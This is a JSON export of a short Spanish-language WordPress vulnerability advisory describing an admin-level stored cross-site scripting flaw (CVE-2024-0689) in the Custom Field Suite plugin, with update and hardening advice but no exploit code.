{"id":3030,"date":"2024-02-28T15:45:08","date_gmt":"2024-02-28T15:45:08","guid":{"rendered":"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/"},"modified":"2024-02-28T15:45:08","modified_gmt":"2024-02-28T15:45:08","slug":"custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin","status":"publish","type":"post","link":"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/","title":{"rendered":"Custom Field Suite <= 2.6.4 – Cross-Site Scripting Almacenado autenticado (Admin+)"},"content":{"rendered":"
El plugin Custom Field Suite para WordPress es vulnerable a Cross-Site Scripting Almacenado a trav\u00e9s de una importaci\u00f3n de metadatos en todas las versiones hasta, e incluyendo, 2.6.4 debido a una insuficiente sanitizaci\u00f3n de la entrada y escapado de la salida en los valores de metadatos. Esto permite a atacantes autenticados, con permisos de administrador y superiores, inyectar scripts web arbitrarios en p\u00e1ginas que se ejecutar\u00e1n cada vez que un usuario acceda a una p\u00e1gina inyectada. Esto solo afecta a instalaciones multi-sitio e instalaciones donde se haya desactivado unfiltered_html.<\/div>\n

<\/p>\n

Para subsanar este problema, se recomienda a los usuarios actualizar el plugin Custom Field Suite a la \u00faltima versi\u00f3n disponible lo antes posible. Adem\u00e1s, es importante seguir las buenas pr\u00e1cticas de seguridad como limitar el n\u00famero de usuarios con permisos de administrador, monitorear constantemente la actividad del sitio en busca de comportamientos sospechosos y asegurarse de que todas las contrase\u00f1as sean s\u00f3lidas y se cambien peri\u00f3dicamente.<\/div>\n
Es fundamental mantener todos los plugins y temas de WordPress actualizados para evitar posibles vulnerabilidades como esta. La seguridad debe ser una prioridad en todo momento para proteger la integridad de tu sitio web y la informaci\u00f3n de tus usuarios.<\/div>\n","protected":false},"excerpt":{"rendered":"

El plugin Custom Field Suite para WordPress es vulnerable a Cross-Site Scripting Almacenado a trav\u00e9s de una importaci\u00f3n de metadatos en todas las versiones hasta, e incluyendo, 2.6.4 debido a una insuficiente sanitizaci\u00f3n de la entrada y escapado de la salida en los valores de metadatos. Esto permite a atacantes autenticados, con permisos de administrador […]<\/p>\n","protected":false},"author":0,"featured_media":0,"comment_status":"","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[743],"class_list":["post-3030","post","type-post","status-publish","format-standard","hentry","category-uncategorized","tag-cve-2024-0689"],"yoast_head":"\nCustom Field Suite <= 2.6.4 - Cross-Site Scripting Almacenado autenticado (Admin+) - SeguridadWordPress.es<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Custom Field Suite <= 2.6.4 - Cross-Site Scripting Almacenado autenticado (Admin+) - SeguridadWordPress.es\" \/>\n<meta property=\"og:description\" content=\"El plugin Custom Field Suite para WordPress es vulnerable a Cross-Site Scripting Almacenado a trav\u00e9s de una importaci\u00f3n de metadatos en todas las versiones hasta, e incluyendo, 2.6.4 debido a una insuficiente sanitizaci\u00f3n de la entrada y escapado de la salida en los valores de metadatos. Esto permite a atacantes autenticados, con permisos de administrador […]\" \/>\n<meta property=\"og:url\" content=\"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/\" \/>\n<meta property=\"og:site_name\" content=\"SeguridadWordPress.es\" \/>\n<meta property=\"article:published_time\" content=\"2024-02-28T15:45:08+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/\",\"url\":\"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/\",\"name\":\"Custom Field Suite <= 2.6.4 - Cross-Site Scripting Almacenado autenticado (Admin+) - SeguridadWordPress.es\",\"isPartOf\":{\"@id\":\"http:\/\/127.0.0.1\/#website\"},\"datePublished\":\"2024-02-28T15:45:08+00:00\",\"dateModified\":\"2024-02-28T15:45:08+00:00\",\"author\":{\"@id\":\"\"},\"breadcrumb\":{\"@id\":\"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"http:\/\/127.0.0.1\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Custom Field Suite <= 2.6.4 – Cross-Site Scripting Almacenado autenticado (Admin+)\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\/\/127.0.0.1\/#website\",\"url\":\"http:\/\/127.0.0.1\/\",\"name\":\"SeguridadWordPress.es\",\"description\":\"Recopilaci\u00f3n de vulnerabilidades WordPress.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/127.0.0.1\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Custom Field Suite <= 2.6.4 - Cross-Site Scripting Almacenado autenticado (Admin+) - SeguridadWordPress.es","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/","og_locale":"en_US","og_type":"article","og_title":"Custom Field Suite <= 2.6.4 - Cross-Site Scripting Almacenado autenticado (Admin+) - SeguridadWordPress.es","og_description":"El plugin Custom Field Suite para WordPress es vulnerable a Cross-Site Scripting Almacenado a trav\u00e9s de una importaci\u00f3n de metadatos en todas las versiones hasta, e incluyendo, 2.6.4 debido a una insuficiente sanitizaci\u00f3n de la entrada y escapado de la salida en los valores de metadatos. Esto permite a atacantes autenticados, con permisos de administrador […]","og_url":"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/","og_site_name":"SeguridadWordPress.es","article_published_time":"2024-02-28T15:45:08+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/","url":"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/","name":"Custom Field Suite <= 2.6.4 - Cross-Site Scripting Almacenado autenticado (Admin+) - SeguridadWordPress.es","isPartOf":{"@id":"http:\/\/127.0.0.1\/#website"},"datePublished":"2024-02-28T15:45:08+00:00","dateModified":"2024-02-28T15:45:08+00:00","author":{"@id":""},"breadcrumb":{"@id":"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/127.0.0.1\/custom-field-suite-2-6-4-cross-site-scripting-almacenado-autenticado-admin\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http:\/\/127.0.0.1\/"},{"@type":"ListItem","position":2,"name":"Custom Field Suite <= 2.6.4 – Cross-Site Scripting Almacenado autenticado (Admin+)"}]},{"@type":"WebSite","@id":"http:\/\/127.0.0.1\/#website","url":"http:\/\/127.0.0.1\/","name":"SeguridadWordPress.es","description":"Recopilaci\u00f3n de vulnerabilidades WordPress.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/127.0.0.1\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}},"amp_enabled":true,"_links":{"self":[{"href":"http:\/\/127.0.0.1\/wp-json\/wp\/v2\/posts\/3030"}],"collection":[{"href":"http:\/\/127.0.0.1\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/127.0.0.1\/wp-json\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"http:\/\/127.0.0.1\/wp-json\/wp\/v2\/comments?post=3030"}],"version-history":[{"count":0,"href":"http:\/\/127.0.0.1\/wp-json\/wp\/v2\/posts\/3030\/revisions"}],"wp:attachment":[{"href":"http:\/\/127.0.0.1\/wp-json\/wp\/v2\/media?parent=3030"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/127.0.0.1\/wp-json\/wp\/v2\/categories?post=3030"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/127.0.0.1\/wp-json\/wp\/v2\/tags?post=3030"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}